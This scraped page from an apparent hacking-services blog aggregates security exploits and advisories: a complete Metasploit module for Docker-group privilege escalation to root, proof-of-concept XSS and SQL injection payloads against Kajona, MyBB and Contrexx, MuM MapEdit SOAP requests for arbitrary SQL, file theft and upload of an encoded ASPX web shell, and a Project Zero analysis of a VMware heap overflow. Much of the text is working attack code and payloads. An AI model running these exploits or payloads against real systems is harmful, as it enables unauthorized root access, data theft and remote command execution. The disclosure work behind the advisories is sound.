##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info, {
'Name' => 'Docker Daemon Privilege Escalation',
'Description' => %q{
This module obtains root privileges from any host account with access to the
Docker daemon. Usually this includes accounts in the `docker` group.
},
'License' => MSF_LICENSE,
'Author' => ['forzoni'],
'DisclosureDate' => 'Jun 28 2016',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X86_64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
'Targets' => [ ['Automatic', {}] ],
'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 60 },
'SessionTypes' => ['shell', 'meterpreter'],
'DefaultTarget' => 0
}
))
register_advanced_options([
OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
], self.class)
end
def check
if cmd_exec('docker ps && echo true') == 'true'
print_error("Failed to access Docker daemon.")
Exploit::CheckCode::Safe
else
Exploit::CheckCode::Vulnerable
end
end
def exploit
pl = generate_payload_exe
exe_path = "#{datastore['WritableDir']}/#{rand_text_alpha(6 + rand(5))}"
print_status("Writing payload executable to '#{exe_path}'")
write_file(exe_path, pl)
register_file_for_cleanup(exe_path)
print_status("Executing script to create and run docker container")
vprint_status cmd_exec("chmod +x #{exe_path}")
vprint_status shell_script(exe_path)
vprint_status cmd_exec("sh -c '#{shell_script(exe_path)}'")
print_status "Waiting #{datastore['WfsDelay']}s for payload"
end
def shell_script(exploit_path)
deps = %w(/bin /lib /lib64 /etc /usr /opt) + [datastore['WritableDir']]
dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")
%Q{
IMG=`(echo "FROM scratch"; echo "CMD a") | docker build -q - | awk "END { print \\\\$NF }"`
EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}"
docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT"
docker rmi -f $IMG
#{exploit_path}
}.strip.split("\n").map(&:strip).join(';')
end
end
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863290593
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Kajona 4.7
Fixed in: 5.0
Fixed Version Link: https://www.kajona.de/en/Downloads/downloads.get_kajona.html
Vendor Website: https://www.kajona.de/
Vulnerability Type: XSS & Directory Traversal
Remote Exploitable: Yes
Reported to vendor: 04/11/2016
Disclosed to public: 09/15/2016
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Kajona is an open source CMS written in PHP. In version 4.7, it is vulnerable
to multiple XSS attacks and limited directory traversal.
The XSS vulnerabilities are reflected as well as persistent, and can lead to
the stealing of cookies, injection of keyloggers, or the bypassing of CSRF
protection.
The directory traversal issue gives information about which files exist on a
system, and thus allows an attacker to gather information about a system.
3. Details
XSS 1: Reflected XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
The function that parses admin requests echoes user input into a JavaScript
context without escaping, leading to reflected XSS. As the injection takes
place into a JavaScript context, browser filters will generally not be able to
filter out an attack.
In the case of Kajona, XSS may lead to code execution, as admins can upload PHP
files via the media manager.
Proof of Concept:
http://localhost/kajona/index.php?admin=1&module=search&action=search&peClose=1&peRefreshPage=';alert(1);foo='
Code:
core/module_system/system/class_request_dispatcher.php
$strReturn = "<html><head></head><body onload=\"parent.location = '" . urldecode(getGet("peRefreshPage")) . "';\"></body></html>";
XSS 2: Reflected XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
The media manager echoes the form_element parameter into a JavaScript context
without escaping, leading to reflected XSS. As the injection takes place into a
JavaScript context, browser filters will generally not be able to filter out an
attack. Note that a valid systemid id is required.
Proof of Concept:
http://localhost/kajona/index.php?admin=1&module=mediamanager&action=folderContentFolderviewMode&systemid=[VALID_SYSTEM_ID]&form_element=']]);alert(1);KAJONA.admin.folderview.selectCallback([['#
Click on "Accept" overlay of an image to trigger the injected code.
XSS 3: Reflected XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
The "class_messageprovider_exceptions_enabled" parameter of the xml.php script
is vulnerable to reflected XSS.
Proof of Concept:
http://localhost/kajona/xml.php?admin=1&module=messaging&action=saveConfigAjax&systemid=&class_messageprovider_exceptions_enabled=false<a xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'><a%3abody onload%3d'alert(1)'%2f><%2fa>&messageprovidertype=class_messageprovider_exceptions
XSS 4: Persistent XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
When creating a comment, the subject is vulnerable to persistent XSS. The click
of an admin is required to execute the injected JavaScript code.
Proof of Concept:
1. Leave a comment:
http://localhost/kajona/index.php?page=postacomment
2. As subject, use:
');alert('1
3. Visit the comment overview:
http://localhost/kajona/index.php?admin=1&module=postacomment&action=list
4. Click edit on the comment
5. Click on "Edit Tags" (the second symbol from the right)
Directory Traversal
When viewing images, the file name is improperly sanitized, allowing for
directory traversal.
It is not possible to actually read out files, as there are additional checks
in place preventing that. But an unauthenticated attacker can still see which
files exist on a system and which do not, making it possible to collect
information for further attacks.
Proof of Concept:
GET /kajona/image.php?image=/files/images/upload/....//....//....//download.php&maxWidth=20&maxHeight=2 HTTP/1.1
-> 200 (but not shown)
GET /kajona/image.php?image=/files/images/upload/....//....//....//foobar.php&maxWidth=20&maxHeight=2 HTTP/1.1
-> 404
Code:
core/module_system/image.php
public function __construct() {
//find the params to use
$this->strFilename = urldecode(getGet("image"));
//avoid directory traversing
$this->strFilename = str_replace("../", "", $this->strFilename);
[...]
}
[...]
private function resizeImage() {
//Load the image-dimensions
if(is_file(_realpath_ . $this->strFilename) && (uniStrpos($this->strFilename, "/files") !== false || uniStrpos($this->strFilename, "/templates") !== false)) {
[...]
}
class_response_object::getInstance()->setStrStatusCode(class_http_statuscodes::SC_NOT_FOUND);
class_response_object::getInstance()->sendHeaders();
}
4. Solution
To mitigate this issue please upgrade at least to version 5.0:
https://www.kajona.de/en/Downloads/downloads.get_kajona.html
Please note that a newer version might already be available.
5. Report Timeline
04/11/2016 Informed Vendor about Issue
04/13/2016 Vendor applies fix to github
05/25/2016 Vendor releases fixed version
09/15/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/Kajona-47-XSS-amp-Directory-Traversal-163.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-StraAe 54
10365 Berlin, Germany
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: MyBB 1.8.6
Fixed in: 1.8.7
Fixed Version Link: http://resources.mybb.com/downloads/mybb_1807.zip
Vendor Website: http://www.mybb.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 01/29/2016
Disclosed to public: 09/15/2016
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
MyBB is forum software written in PHP. In version 1.8.6, it is vulnerable to a
second order SQL injection by an authenticated admin user, allowing the
extraction of data from the database.
3. Details
Description
CVSS: Medium 6.0 AV:N/AC:M/Au:S/C:P/I:P/A:P
The setting threadsperpage is vulnerable to second order error based SQL
injection. An admin account is needed to change this setting.
The injection takes place into a LIMIT clause, and the query also uses ORDER
BY, making an injection of UNION ALL not possible, but it is still possibly to
extract information.
Proof of Concept
Go to the settings page:
http://localhost/mybb_1806/Upload/admin/index.php?module=config-settings&action=change&gid=7
For Setting "threadsperpage" use:
20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
Visit a forum to trigger injected code:
http://localhost/mybb_1806/Upload/forumdisplay.php?fid=3
The result will be:
SQL Error:
1105 - XPATH syntax error: ':5.5.33-1'
Query:
SELECT t.*, (t.totalratings/t.numratings) AS averagerating, t.username AS threadusername, u.username FROM mybb_threads t LEFT JOIN mybb_users u ON (u.uid = t.uid) WHERE t.fid='3' AND t.visible IN (-1,0,1) ORDER BY t.sticky DESC, t.lastpost desc LIMIT 0, 20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
Code
forumdisplay.php
$perpage = $mybb->settings['threadsperpage'];
[...]
$query = $db->query("
SELECT t.*, {$ratingadd}t.username AS threadusername, u.username
FROM ".TABLE_PREFIX."threads t
LEFT JOIN ".TABLE_PREFIX."users u ON (u.uid = t.uid)
WHERE t.fid='$fid' $tuseronly $tvisibleonly $datecutsql2 $prefixsql2
ORDER BY t.sticky DESC, {$t}{$sortfield} $sortordernow $sortfield2
LIMIT $start, $perpage
");
4. Solution
To mitigate this issue please upgrade at least to version 1.8.7:
http://resources.mybb.com/downloads/mybb_1807.zip
Please note that a newer version might already be available.
5. Report Timeline
01/29/2016 Informed Vendor about Issue
02/26/2016 Vendor requests more time
03/11/2016 Vendor releases fix
09/15/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/MyBB-186-SQL-Injection-159.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
# Security Advisory -- Multiple Vulnerabilities - MuM Map Edit
## Product
Vendor: Mensch und Maschine Software SE / Mensch und Maschine acadGraph GmbH
Product: MapEdit
Affected software version: 3.2.6.0
MuM MapEdit provides geodata to the internet and intranets and is deployed on several communal and
regional governmental infrastructures to provide geodata to the population. It consists of a
silverlight client and a C#.NET backend. The communication between them is HTTP/S based and involves
the NBFS (.NET Binary Format SOAP).
Link: http://www.mum.de/DE_Autodesk-Topobase-GIS-Datenerfassung-MuM-MapEdit.CAD
## Status/Metrics/Identifier
CVE-ID: tbd
CVSS v2 Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C)
CVSS Score: 9.0
The CVSS Score reflects the possibility of an attacker to upload web shells and execute them with
the privileges of the web server user.
## Author/Credits
Paul Baade (TÜV Rheinland i-sec GmbH)
Sven Krewitt (TÜV Rheinland i-sec GmbH)
## Fixed Versions
According to MuM all described vulnerabilities are fixed in version 6.2.74, some of them are reportedly
already fixed in version 5.1.
## Authentication via GET Parameter
The application requires users to provide their credentials via GET Parameters. They can therefore
possibly be found in server logs or proxy logs. An example URL would be:
/Mum.Geo.Services/Start.aspx?AutoUrl=1&Username=TEST&Password=TEST[...]
## Execution of arbitrary SQL commands on contained SQLite DBs
The application contains several SQLite databases. An authenticated user may send POST requests to
the URL /Mum.Geo.Services/DataAccessService.svc. This service is used to execute SQL queries
on the databases.
The content of the POST request is encoded in Microsofts NBFS (.NET Binary Format SOAP) and can be
decoded to the following XML data:
Request:
--------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:DataAccessService/QueryData</a:Action>
<a:MessageID>urn:uuid:b086a157-1bce-41be-b25c-492ab4f6dfa3</a:MessageID>
<a:SequenceAcknowledgement>
<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
</a:SequenceAcknowledgement>
<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/DataAccessService.svc</a:To>
</s:Header>
<s:Body>
<QueryData>
<connection i:type="c:SQLiteConnection" xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess" xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess.SQLite">
<b:CurrentRepresentation>
<b:CollectionFeatureClassName/>
<b:Id>0</b:Id>
<b:LineFeatureClassName/>
<b:Name/>
<b:PointFeatureClassName/>
<b:PolygonFeatureClassName/>
</b:CurrentRepresentation>
<b:DbVersion>999</b:DbVersion>
<b:Id>0</b:Id>
<b:Name>SYSTEM</b:Name>
<b:StorageSchemaType>Unknown</b:StorageSchemaType>
<c:Filename>[path_to_MumGeoData]\System\System.db</c:Filename>
</connection>
<sql>select name, caption, version_systemdata from project where id in (select Project_id from usergroup_project where usergroup_id in (select usergroup_id from user_usergroup where user_id in (select id from user where name='TEST'))) order by caption</sql>
<queryDefinition xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Columns/>
<b:SRID>0</b:SRID>
</queryDefinition>
<parameterNames xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/>
<parameterValues xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/>
<startRow>1</startRow>
<bufferSize>2000</bufferSize>
<limit>0</limit>
</QueryData>
</s:Body>
</s:Envelope>
The node "Filename" can be used to access different SQLite databases on the system, while the node
"sql" contains the SQL-query to be executed on the system.
Responses to this request are encoded in NBFS as well and can be decoded to the following XML data:
Response:
---------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:DataAccessService/QueryDataResponse</a:Action>
<a:RelatesTo>urn:uuid:b086a157-1bce-41be-b25c-492ab4f6dfa3</a:RelatesTo>
</s:Header>
<s:Body>
<QueryDataResponse>
<QueryDataResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Core" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Parameter xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess">
<c:Data>eNpjZAACZncXTwihYm6SlpiUammsa2hpaKlrkmhsrpuYamSpa2RkbGxpkZpsYZCSDAD4Jgsj</c:Data>
<c:FetchedAllRows>true</c:FetchedAllRows>
<c:ResultColumns>
<c:DbColumnDefinition>
<c:Caption>NAME</c:Caption>
<c:DataType>DbString</c:DataType>
<c:DefaultValue/>
<c:IsNullable>false</c:IsNullable>
<c:IsPrimaryKey>false</c:IsPrimaryKey>
<c:Length>255</c:Length>
<c:Name>NAME</c:Name>
<c:Precision>0</c:Precision>
<c:Scale>0</c:Scale>
</c:DbColumnDefinition>
<c:DbColumnDefinition>
<c:Caption>CAPTION</c:Caption>
<c:DataType>DbString</c:DataType>
<c:DefaultValue/>
<c:IsNullable>false</c:IsNullable>
<c:IsPrimaryKey>false</c:IsPrimaryKey>
<c:Length>255</c:Length>
<c:Name>CAPTION</c:Name>
<c:Precision>0</c:Precision>
<c:Scale>0</c:Scale>
</c:DbColumnDefinition>
<c:DbColumnDefinition>
<c:Caption>VERSION_SYSTEMDATA</c:Caption>
<c:DataType>DbString</c:DataType>
<c:DefaultValue/>
<c:IsNullable>true</c:IsNullable>
<c:IsPrimaryKey>false</c:IsPrimaryKey>
<c:Length>40</c:Length>
<c:Name>VERSION_SYSTEMDATA</c:Name>
<c:Precision>0</c:Precision>
<c:Scale>0</c:Scale>
</c:DbColumnDefinition>
</c:ResultColumns>
</b:Parameter>
<b:State>
<b:Tags>
<b:Item i:nil="true"/>
</b:Tags>
<b:ExceptionMessage/>
<b:StackTrace/>
<b:Succeeded>true</b:Succeeded>
</b:State>
</QueryDataResult>
</QueryDataResponse>
</s:Body>
</s:Envelope>
The nodes "DbColumnDefinition" contain the definition of the returned columns, the node "Data"
contains the result of the SQL-query as an Base64-encoded zlib-compressed data:
GDI|GDI|74fabe93-1919-4a37-ae29-223398ec80dc
The same result can be produced, when the database is locally read:
>sqlite3 System.db
sqlite> select name, caption, version_systemdata from project where id
in (select Project_id from usergroup_project where usergroup_id
in (select usergroup_id from user_usergroup where user_id
in (select id from user where name='TEST'))) order by caption;
GDI|GDI|74fabe93-1919-4a37-ae29-223398ec80dc
## Arbitrary file manipulation
By sending POST requests to the URL /Mum.Geo.Services/IO.svc an authenticated user is able to
perform several actions.
Most interesting, from an attacker's point of view, would be the following:
- "GetFileName", which lists files in a given folder
- "DownloadFile", which enables the user to download any file the web server has read-access to
- "UploadFile", which allows to upload files to folders the web server has write-access to
The different activities are documented in the subsections below.
As well as in the SQL execution section, the request and response content is decoded from NBFS for
better readability.
### File exploration
An authenticated user is able to list all files in a given folder by sending the following content
to the IO Service.
Request:
--------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/GetFileNames</a:Action>
<a:MessageID>urn:uuid:037dee48-520a-46ae-a47b-b9b57a901676</a:MessageID>
<a:SequenceAcknowledgement>
<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
</a:SequenceAcknowledgement>
<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>
</s:Header>
<s:Body>
<GetFileNames>
<path>[path_to_webroot]</path>
<searchPattern>*.*</searchPattern>
<recursive>false</recursive>
</GetFileNames>
</s:Body>
</s:Envelope>
Response:
---------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/GetFileNamesResponse</a:Action>
<a:RelatesTo>urn:uuid:037dee48-520a-46ae-a47b-b9b57a901676</a:RelatesTo>
</s:Header>
<s:Body>
<GetFileNamesResponse>
<GetFileNamesResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Core" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Parameter xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.IO">
<c:FileNames xmlns:d="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d:string>clientaccesspolicy.xml</d:string>
<d:string>crossdomain.xml</d:string>
<d:string>iisstart.htm</d:string>
<d:string>index.html</d:string>
<d:string>index.php</d:string>
<d:string>Thumbs.db</d:string>
<d:string>web.config</d:string>
<d:string>welcome.png</d:string>
</c:FileNames>
<c:Path>[path_to_webroot]</c:Path>
</b:Parameter>
<b:State>
<b:Tags>
<b:Item i:nil="true"/>
</b:Tags>
<b:ExceptionMessage/>
<b:StackTrace/>
<b:Succeeded>true</b:Succeeded>
</b:State>
</GetFileNamesResult>
</GetFileNamesResponse>
</s:Body>
</s:Envelope>
### Download of arbitrary files
The same web service can be abused to download any file, that the web server user has read-access to.
Request:
--------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/DownloadFile</a:Action>
<a:MessageID>urn:uuid:48428e6d-19b5-42e2-ad6c-6bfde4849504</a:MessageID>
<a:SequenceAcknowledgement>
<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
</a:SequenceAcknowledgement>
<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>
</s:Header>
<s:Body>
<DownloadFile>
<filename>[path_to_webroot]\Mum.Geo.Services\Admin.html</filename>
</DownloadFile>
</s:Body>
</s:Envelope>
Response:
---------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/DownloadFileResponse</a:Action>
<a:RelatesTo>urn:uuid:48428e6d-19b5-42e2-ad6c-6bfde4849504</a:RelatesTo>
</s:Header>
<s:Body>
<DownloadFileResponse>
<DownloadFileResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Server.Core.IO" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Data>77u/PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPg0KPGh0bWwgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPg0KPGhlYWQ+DQogICAgPHRpdGxlPkFkbWluPC90aXRsZT4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOyBVUkw9U3RhcnQuYXNweD9BZG1pbk1vZGU9dHJ1ZSIvPg0KPC9oZWFkPg0KPGJvZHk+DQogIDxwPjxhIGhyZWY9IlN0YXJ0LmFzcHg/QWRtaW5Nb2RlPXRydWUiPlN0YXJ0IE11bSBBZG1pbmlzdHJhdG9yPC9hPjwvcD4gDQo8L2JvZHk+DQo8L2h0bWw+DQo=</b:Data>
<b:FileNotFound>false</b:FileNotFound>
<b:IsComplete>true</b:IsComplete>
</DownloadFileResult>
</DownloadFileResponse>
</s:Body>
</s:Envelope>
The node "Data" itself can be base64-decoded, to receive the file contents:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Admin</title>
<meta http-equiv="refresh" content="0; URL=Start.aspx?AdminMode=true"/>
</head>
<body>
<p><a href="Start.aspx?AdminMode=true">Start Mum Administrator</a></p>
</body>
</html>
### Upload of arbitrary files
The web service can be abused to upload a file to any folder, that the web server user has
write-access to.
Request:
--------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/UploadFile</a:Action>
<a:MessageID>urn:uuid:20cca52e-da4c-4981-a433-eb596411d89a</a:MessageID>
<a:SequenceAcknowledgement>
<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
</a:SequenceAcknowledgement>
<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>
</s:Header>
<s:Body>
<UploadFile>
<clientFilename/>
<serverFilename>[path_to_webroot]\MumGeoData\Userdata\GDI\isec.aspx</serverFilename>
<temporaryServerFilename>[path_to_MumGeoData]\Userdata\GDI\e41279bd-343d-48a1-a413-05e1b3c50f40\Bookmarks\Bookmarks.sod.tmp636008925231332626</temporaryServerFilename>
<data>eJyFk21P2zAQx9/nU5w8IbXalj4A29Qk1aANolJHK5qJaW+QkxwhW2JHtgNBE99956TdWEHsleN7/Pl/F//gM6x5hrDkIqvpI2CzNwzmGNdZwIyqkUGkeEL2G15ouh1MHZ+SFmUllYELXqKuWv/mQRss3XnOMyG1yRP9/+DFqovRicor8wQiIQhVC24CplHdoWJT507maQt7vZQ87cn4ByYGNIoU1TsI71CYE5VpwL7zy3l0tFG5yCBsktrgrEx7WwNXmQ1YK5mg1hvDlVmIGwmVziEAgfew7+r1PYe87lleoH0DhbGkTF1skHUe6luX1F9b1yAB9pa6dK5LTHNFoFRNpFylq9pUtaE4K24X8lXj5haLImzQspKv1drbMUJFpu2321L1KI2gNkYhLy+RkwKgTalSRZGV+28vbyeFpeuiXJsTyVCk9m1b26yQGu1doamVAO2Riq3o9Fhiu54VefJzX/ftJPfkv6RBS6HRvVK5wR7zK4VTRrX3HJt2uO65KYtQJDLF3t95mcYWdCNsTL//PJX5g13RR8cfdCtEu3QefVnaIzyZ02FyU+CU36MAritXoIF7jLWV2x90TkreBscyfQA6b6QqIU8DO2UGJZpbSZeKtvr5VvpUdmIZT2XT5nTYjJR+KGiTv79fXMzDbxMYDUceLMOzaAJHw+Oq8WC92iyixepiAjzWsqBnexCt1hMYD6tmvxNc5am5Ddj42Dqn/uBJ3y3FaW2MFB0E0h8oXqQY7yg+fHydYvTpBQrbMWDYDonBSrQ70Qr1Z0N2cB3Olm3JYyxatCIubJGX0A53aIej4esCjZ+jTWeyLGnvJ133tqGdrR2mPe1w21m3+/EbI5Kikw==</data>
<append>false</append>
<completed>true</completed>
</UploadFile>
</s:Body>
</s:Envelope>
The "data" node contains a base64-encoded, zlib-packed aspx web shell. It can be used to issue
arbitrary commands on the compromised host.
Response:
---------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/UploadFileResponse</a:Action>
<a:RelatesTo>urn:uuid:20cca52e-da4c-4981-a433-eb596411d89a</a:RelatesTo>
</s:Header>
<s:Body>
<UploadFileResponse>
<UploadFileResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Core" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Parameter/>
<b:State>
<b:Tags>
<b:Item i:nil="true"/>
</b:Tags>
<b:ExceptionMessage/>
<b:StackTrace/>
<b:Succeeded>true</b:Succeeded>
</b:State>
</UploadFileResult>
</UploadFileResponse>
</s:Body>
</s:Envelope>
## Base64 encoded Passwords
In the database file in \MumGeoData\System\System.db Passwords are stored in the tables "user" and
"connection". Both tables store their passwords in plain text with base64 encoding applied.
Example:
sqlite> select * from user where name='MUM';
<User GUID>|MUM|<base64 encoded password>|1||
## Remark about information disclosures
Observing the communication between a MapEdit Silverlight client and its backend server, various
information could be gathered, particularly file paths and license keys. Additionally the error
messages, that the server generates discloses quite a lot of information about the backend parsing
process.
## History
2016-06-07 Discovery of mentioned vulnerabilities
2016-06-09 First contact with MuM
2016-06-23 confirmation of mentioned vulnerabilities
2016-07-29 Release of version 6.2.74
2016-09-13 Public disclosure
# Exploit Title: Contrexx CMS:egov moudle SQL injection
# Google Dork: inurl:?section=egov
# Date: 12/9/2016
# Exploit Author: hamidreza borghei
# Software Link: https://www.cloudrexx.com/de/index.php?section=downloads&cmd=7&category=8
# Version: 1.0.0
# Tested on: linux
sql injection in id parameter:
http://server/index.php?section=egov&cmd=details&id=[sql query]
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=849
As already discussed in a number of reports in this tracker (#285, #286, #287, #288, #289, #292), VMware Workstation (current version 12.1.1 build-3770994) ships with a feature called "Virtual Printers", which enables the virtualized operating systems to access printers installed on the Host. Inside the VM, the communication takes place through a COM1 device, and the incoming data is handled by a dedicated "vprintproxy.exe" process on the Host, as launched by the "vmware-vmx.exe" service. Administrative privileges are not required to access COM1 in the guest, at least on Windows.
The vprintproxy.exe is a significant attack surface for potential VM escapes. Due to its nature, the application implements support for a variety of complex protocols and file formats, such as the printing protocol, EMFSPOOL format, and further embedded EMFs, fonts, images etc. This report addresses a bug in the handling of TrueType fonts embedded in EMFSPOOL, as implemented in the TPView.DLL library extensively used by vprintproxy.exe.
The version of the TPView.DLL file referenced in this report is 9.4.1045.1 (md5sum b6211e8b5c2883fa16231b0a6bf014f3).
TrueType fonts can be embedded in EMFSPOOL files via EMRI_ENGINE_FONT records. When such a record is encountered while processing the printing request data, some complex logic is executed to load the font into the program's internal structures. For reasons which are not fully clear to me, one of the operations is to copy the contents of the CMAP table into the NAME table in memory - or, if the latter is larger than the former, create a completely new NAME table with CMAP's data. This is generally implemented in a function located at address 0x1005C230, and the high-level logic is as follows:
--- cut ---
CMAP = FindCmapTableHeader();
CMAP_size = ExtractSize(CMAP);
CMAP_body = ExtractBody(CMAP);
NAME = FindNameTableHeader();
if (NAME) {
NAME_size = ExtractSize(NAME);
NAME_body = ExtractBody(NAME);
SetTableSize(NAME, CMAP_size);
memset(NAME_body, 0, NAME_size);
if (CMAP_size > NAME_size) {
SetTableOffset(NAME, font_size);
font_data = realloc(font_size + CMAP_size);
memset(&font_data[font_size], 0, CMAP_size);
memcpy(&font_data[font_size], CMAP_body, CMAP_size);
} else {
memcpy(NAME_body, CMAP_body, CMAP_size);
}
}
--- cut ---
As you can see, the function doesn't perform any bounds checking of the values (offsets, sizes) loaded from table headers. Some of the fields have already been verified before and are guaranteed to be valid at this point of execution, but some of them (such as CMAP_body or NAME_size) are still fully controlled. While controlling the pointer to the CMAP section data (relative to the start of the font buffer) may be useful, being able to cheat about the NAME table size enables an attacker to cause a much more dangerous memory corruption on the heap.
For example, if we set the NAME size to an enormous value (e.g. 0xAAAAAAAA), we will encounter an immediate crash in the memset() function, as shown below:
--- cut ---
(22f0.26ac): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Common Files\ThinPrint\TPView.dll -
eax=01555540 ebx=00000000 ecx=215cefc0 edx=00000026 esi=215b87d4 edi=aaaaaaaa
eip=68102056 esp=2247f298 ebp=2247f2e8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
TPView!TPRenderW+0x1547f6:
68102056 660f7f4140 movdqa xmmword ptr [ecx+40h],xmm0 ds:002b:215cf000=????????????????????????????????
--- cut ---
If the NAME table size is increased by a smaller degree, such that the memset() call doesn't hit unmapped page boundary, the code may successfully finish the call and proceed to copying the contents of the CMAP section into the small NAME memory area, which would finally result in a typical heap-based buffer overflow condition with controlled length and data.
